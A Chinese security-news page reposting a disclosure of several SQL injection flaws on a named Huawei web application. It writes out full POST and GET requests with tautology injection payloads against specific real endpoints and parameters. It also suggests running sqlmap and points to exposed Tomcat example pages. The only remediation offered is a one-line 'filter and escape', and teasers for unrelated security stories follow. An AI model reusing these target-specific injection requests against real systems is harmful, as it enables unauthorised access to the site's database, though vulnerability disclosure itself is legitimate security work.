华为某站多个sql注入漏洞
扫描二维码随身看资讯
使用手机 二维码应用 扫描右侧二维码,您可以
1. 在手机上细细品读~
2. 分享给您的微信好友或朋友圈~
华为某站多个sql注入漏洞,你可以在这篇资讯里查看详细的漏洞介绍,而且小编还为大家提供了非常简单的漏洞解决方案。
POST http://softcoreonline.huawei.com/app/front/faq!list.action
appId=402880823c1e6e77013c1e79016a0003&pager.keyword=-1' or 1=1 or 'aaa'='aaa&pager.orderBy=createDate&pager.orderType=desc&pager.pageNumber=1&pager.property=questions&type=
参数:pager.keyword
另两处:
POST http://softcoreonline.huawei.com/front/faq!list.action
appId=402880e53c0df5db013c0df743310001&pager.keyword=-1' OR 1=11 or 'aaa'='aaa&pager.orderBy=createDate&pager.orderType=desc&pager.pageNumber=1&pager.property=questions&type=
http://softcoreonline.huawei.com/app/front/app!checkMobile.action?appIds=402880823c1e6e77013c1e7710e50001,402880e43c0b3094013c0b31465b0001,402880823c1e6e77013c1e79016a0003,402880e53c0df5db013c0df743310001&applyInfo.mobile=-1' or 1=1 or 'aaa'='aaa
sqlmap跑下
另删下Tomcat exampleshttp://softcoreonline.huawei.com/examples/servlets/index.html
解决方案:
过滤转义。
-
CVE-2015-3839漏洞能够使短信程序崩溃
研究人员在安卓系统中发现了两个新漏洞,它们可以破坏手机和平板
-
操控Bunitu僵尸网络的网络犯罪分子们可以感染代理服务器
操控Bunitu僵尸网络的网络犯罪分子们可以利用Bunitu僵尸网络来感
-
机场安检设备在黑客攻击面前不堪一击
现在,通过一台普通的笔记本电脑,黑客就可以入侵机场的安全网络了,机
-
DD4BC黑客组织用DDoS敲诈勒索比特币 近来活动加剧
自从去年9月以来,一个名字为DD4BC的黑客组织的攻击敲诈行为被曝光